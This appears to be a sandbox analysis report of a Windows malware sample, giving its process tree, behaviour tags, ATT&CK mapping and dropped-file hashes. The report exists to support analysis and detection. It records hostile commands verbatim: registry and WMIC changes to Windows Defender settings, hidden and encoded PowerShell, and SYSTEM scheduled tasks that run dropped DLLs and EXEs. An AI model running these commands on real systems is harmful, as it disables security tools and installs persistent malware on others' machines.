\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKPbLIPtdWjYWtgKbM"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TGSqLNfOU\NDYUDM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rkutRMUCKyfxaPV" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rkutRMUCKyfxaPV2" /F /xml "C:\Program Files (x86)\TGSqLNfOU\mLutPpa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rkutRMUCKyfxaPV"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rkutRMUCKyfxaPV"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ymGpHCUadFDCAu" /F /xml "C:\Program Files (x86)\jbywMxbyABuU2\yldDABG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KIJZzoLWERVEa2" /F /xml "C:\ProgramData\tvOexZGeSXRtrQVB\MuqKIEN.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cKCvNSfFKKPlDebmW2" /F /xml "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\oOEgyeT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIVMXXvuSFGZiLTKXPV2" /F /xml "C:\Program Files (x86)\vZXYUjRGERiGC\LqbEsou.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WEqRGXvoovdTvsnPk" /SC once /ST 05:06:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jLjeNaiUMFXhhNbk\ggohLDQv\DBirfQG.dll\",#1 /rHdidW 385135" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WEqRGXvoovdTvsnPk"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LyeaCXeAXIXykqmfO"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 6683⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exeC:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exe M5 /dNcdidaLlL 385135 /S2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LyeaCXeAXIXykqmfO" /SC once /ST 01:47:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\hVUcgSG.exe\" lW /Kthhdidkj 385135 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LyeaCXeAXIXykqmfO"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 6243⤵
- Program crash
-
C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\hVUcgSG.exeC:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\hVUcgSG.exe lW /Kthhdidkj 385135 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKPbLIPtdWjYWtgKbM"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TGSqLNfOU\LMFzmB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rkutRMUCKyfxaPV" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rkutRMUCKyfxaPV2" /F /xml "C:\Program Files (x86)\TGSqLNfOU\fojvEjJ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rkutRMUCKyfxaPV"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rkutRMUCKyfxaPV"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ymGpHCUadFDCAu" /F /xml "C:\Program Files (x86)\jbywMxbyABuU2\eYEkLFX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KIJZzoLWERVEa2" /F /xml "C:\ProgramData\tvOexZGeSXRtrQVB\LBgNQcB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cKCvNSfFKKPlDebmW2" /F /xml "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\cSuranC.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIVMXXvuSFGZiLTKXPV2" /F /xml "C:\Program Files (x86)\vZXYUjRGERiGC\uxeimXa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LyeaCXeAXIXykqmfO"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 9003⤵
- Program crash
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jLjeNaiUMFXhhNbk\ggohLDQv\DBirfQG.dll",#1 /rHdidW 3851352⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jLjeNaiUMFXhhNbk\ggohLDQv\DBirfQG.dll",#1 /rHdidW 3851353⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WEqRGXvoovdTvsnPk"4⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {22CB941E-8E62-4662-8CC9-46970B77C7C3} S-1-5-21-39690363-730359138-1046745555-1000:EILATWEW\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Scheduled Task/Job
1Persistence
Create or Modify System Process
4Windows Service
4Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Defense Evasion
Modify Registry
5Impair Defenses
3Disable or Modify Tools
1Disable or Modify System Firewall
1Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.0MB
MD57e136fd239e52e3d0e54d291eeb533d1
SHA18875b7433b406087d02c33b5c1b85944916b8dfd
SHA256c029439ac2e38c4b31993b793022f17be781000fb06a059039234de3c0b42741
SHA51295174d414b01f474dfdcceddf865fc6ee92599d8449fcb55f74e1fffa73338e9314976011e99dc3d129cb53b2319e40e1624a94bd1bf4130ab95a17ee5fc2a07
-
C:\ProgramData\BFHJECAAAF.exeFilesize
740KB
MD5d9da4e934cfed81304e5fe2d43f4fc5e
SHA14ea331a79dc631f35e73d7a0e374fc9be6181df1
SHA2567cf82df6cafe847f47b73ba110f009d277f09d82a73758959e1b9598055ed78f
SHA512f25ece36c23329791f9c1e4efb1fa05458fb3fde4567c01c680b9b4c4e67e60bc51f7e5d6ae0157be1d103c7b91cdcddacc8ffd10116d7cdeda1396a1b1644e0
-
C:\ProgramData\DBKKFHIEGD.exeFilesize
1.8MB
MD57fc744e8d5f2c7c533dd995a5d0c1d30
SHA1f8220ea06b9c3e5d31a203f63787bd502780f33c
SHA25600bb335318bc7964d7d8f58e4e3688d340431a5f38998ee257898c88874b0797
SHA512c3a96071bdabaaca5689f11c14505d0d4bd8f877a7aaf6ce5b376db46cd589819bf810c68f704197a9a91b7ce46217e7a05c3f86b7d64cd61a7a367178e68aeb
-
C:\ProgramData\HIIEBAFCBKFI\IIJDBGFilesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD5de9a6aac46ba85a6044d31a957710959
SHA1077284fee0ef623be8c657e7543edc69e7a993ed
SHA25643f762b8facc692c9ded79bd585da945ef1cef70b6132a85406c36b3c5d0a90f
SHA51290de83e3a636263e3051cb6118f862858b31b7edfca00c56e837e9925238d907e26ee830eb60542d3314cf432ec982c1e2f6add4134c2c2872e6b4a27661e074
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD55efe1a558ce875505fb139848064344f
SHA107cde54a48d84fdc1473f5796a3822dbc72ccbf5
SHA256ad7756a7fe1fd9d5358512b5c721f1580c7cb4e50820877aa416e79d6f2cb1f3
SHA5124dfe4a99e3cb4d401665df493d7fb74fdca10766b2d1c48aaa1a24e91d8e0b5c679ee0227b2165b3fe76696519ae09bb7d2c075f95b31ebeb97340fff4e967bc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD5f53614b6bc0c9c195a9fd8f37d4ae78e
SHA1202caba16ea424b5d0187f5cb0e2553cba3546c9
SHA256e9b6f7933836b4c5129ad7eedd6d1b9a78dd3e12617841af7b94a4ffe0e7c676
SHA5126288738168a604f5a645239d8e441aa490046edccda3c800322dd9fffa229a2e9ce0e4c902b363202245ee988ba538372d29370f84baa3ba251d727f34ddc768
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD5e9a44260f335738cf6cf71d0a363f621
SHA1fe9526612efd913b5765d0dfcdf04c7d3ffa3903
SHA256146d1e4e9d9215404fde14f89b3d973b65f52240d003e8120b7af9b84f6e977c
SHA512e512511cb176175b1ff8a37ff1afdf8b3291b00bbfbc1a57fa673812b7b79edf35cbd51e7f7de64eb38f5ae5ceb616cd300c0cb7e5d55095b6e3c2aca5cc6873
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD5bf3a72a678fd3f3febf103a0f98c1b9c
SHA158359046e858977610d78b8d10ff73051dcd1bb0
SHA256844ef0865598405c6cf7a16d6fac5ab4a0aab2320cc386cc35dad9b7eb0af0cf
SHA51292fac5efdb2e4af50097d6d8b6c05f00b4c11ab45f0e8a3236af3670192fcce78b649031e73384870ac9887071d207be4f4ebaec67b451d37f6ea96afbdaaa43
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD512f221db250ecf9063b882b9a891baa3
SHA1b5cbd04a4b0cddcddbce0e2e847682355f05280e
SHA2564b28d303f1e6205c6222502fdd9dcfb982134d20736daa94ff2e66ed95280960
SHA51206954a40f940f9c80736f8d6f22498192ded4588318f66c6a7aa00d396d7fdd374779a14e62c33e2557ce4b91608749270e5a62b0815a877c56f7276774f6384
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD54ef411db3216700b05329ba6d0da886b
SHA1001f52ceb34c87b1e3557bf36e5cbb3819685946
SHA25655d9664f2f40b90b4ecbbee2b0f78aabd2ff55a6c2825d648aae5405283479c1
